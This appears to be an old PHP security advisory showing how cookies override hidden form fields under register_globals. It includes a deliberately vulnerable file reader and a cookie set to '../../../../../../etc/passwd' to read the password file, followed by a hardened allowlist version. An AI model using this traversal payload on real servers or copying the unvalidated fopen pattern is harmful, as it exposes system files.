PHP forms can be subverted if the programmer assumed hidden fields are secure variables. Exploit description included.
#php exploit by Daniel Phoenix
synopsis: problem exists where users can change values of variables in forms by simply setting a cookie. I can only see this as a real problem where a programmer explicitly sets hidden fields he does not want the user to change.
Solution: Don't ever assume hidden fields are secure variables.
-------------------------------------example exploit----------------------------------------------
ok first run form.php
hit enter and it should open a file called list.txt
---
ok now run setcookie.php
now it does not matter what you enter in the form because
the $test variable set in cookies will override anything passed
from the form. Run the form again
--your password file comes up.
----------------------------------form.php---------------------------------------------------------
<form action="print.php">
<input type="hidden" name="test" value="list.txt">
<input type="SUBMIT" name="whatever" value="let me see the file">
</form>
---------------------------------list.txt---------------------------------------------------------
test
test
test
test
test
test
test
test
test
test
-------------------------------print.php---------------------------------------------------------
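<?
// Deliberately vulnerable: $test is never assigned here. It relies on PHP
// importing GET, POST and cookie values as globals (register_globals),
// so a cookie named "test" can supply the file name.
$myfile=fopen($test,"r");
fpassthru($myfile); // pass the file handle itself, not a quoted string
?>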
------------------------------setcookie.php-----------------------------------------------------
<?
setcookie("test","../../../../../../etc/passwd");
echo "cookie inserted";
?>
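-------------------------------print.php (hardened)-------------------------------------------
One way to write print.php so that it does not trust the hidden field, shown as an added example that is not part of the original advisory. It assumes the form uses GET (its default method) and that viewable files live in a "docs" directory beside the script; ALLOWED_FILES, resolve_listed_file and "docs" are names chosen here for illustration.

```php
<?php
// Added example: hardened print.php. Not part of the original advisory.
// Assumptions: the form submits with GET, and viewable files are kept in a
// "docs" directory next to this script.

// Server-side allowlist: the only values the hidden field may carry.
const ALLOWED_FILES = ['list.txt'];

/**
 * Return the absolute path for a requested name, or null if it is not
 * permitted. The name is only joined to a path after it has matched the
 * allowlist, and the resolved path must still sit inside $baseDir.
 */
function resolve_listed_file($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !in_array($requested, ALLOWED_FILES, true)) {
        return null;                       // e.g. "../../etc/passwd"
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;                       // directory or file is missing
    }
    // Containment check guards against symlinks that point outside $baseDir.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the value from the one source the form actually uses. $_GET ignores
// cookies, so a "test" cookie can no longer override the form field, and the
// allowlist covers a user editing the hidden field or the URL directly.
$path = resolve_listed_file($_GET['test'] ?? null, __DIR__ . '/docs');
if ($path === null) {
    http_response_code(400);
    exit('Unknown file');
}
header('Content-Type: text/plain; charset=utf-8');
readfile($path);
```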